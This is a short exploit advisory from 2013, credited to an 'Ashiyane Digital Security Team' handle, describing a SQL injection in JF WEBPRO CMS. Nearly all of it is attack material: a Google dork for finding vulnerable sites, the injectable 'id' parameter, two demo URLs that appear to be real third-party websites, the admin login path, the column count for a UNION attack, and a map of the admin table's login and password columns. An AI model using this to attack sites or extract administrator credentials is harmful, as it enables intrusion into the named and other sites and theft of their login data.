facebook facebook twitter rss

JF WEBPRO CMS SQL Injection Vulnerability

Author: Ashiyane Digital Security Team , Published: 04-04-2013
##############################################################################
# Exploit Title: JF WEBPRO CMS SQL Injection Vulnerability
# Google Dork: allinurl:"exibir_noticias.php?id="
# Date: 3/4/2013
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.jfwebpro.com.br
# Version: All Versions
# Tested on: Windows 7 Starter SP1
# Category: Web Application
# Security Risk : High - SQL Injection
# Application Language: Spanish
##############################################################################
# Reported By : MR.SoCiAl-EnGiNeEr | Ashiyane Digital Security Team
# Author Home Page: http://ashiyane.org
# SPESIAL TNX TO : Hasani_farhad,hossein19123,MR.SAMAN,Black-Hole
# AND ALL ASHIYANE DIGITAL SECURITY MEMBERS
##############################################################################
# Location: http://www.domain.com/exibir_noticias.php?id= [ SQL CODE ]
# Demo 1: http://www.70km.com.br/exibir_noticias.php?id=16
# Demo 2: http://www.consultoriasousalima.com.br/exibir_noticias.php?id=2
##############################################################################
# Admin Login Page:
#
# http://www.domain.com/login.php
#======================================================+
# SQL Injection Help:
# - Columns Count : 7
# - Valid Column: 2
#======================================================+
# Database Map:
#
# Database
# |
# +-adm (columns)=> id , login , senha
# |
# +-noticiaas (columns)=> id , titulo , foto , autor , texto , data , fonte
#
##############################################################################

Like us on Facebook :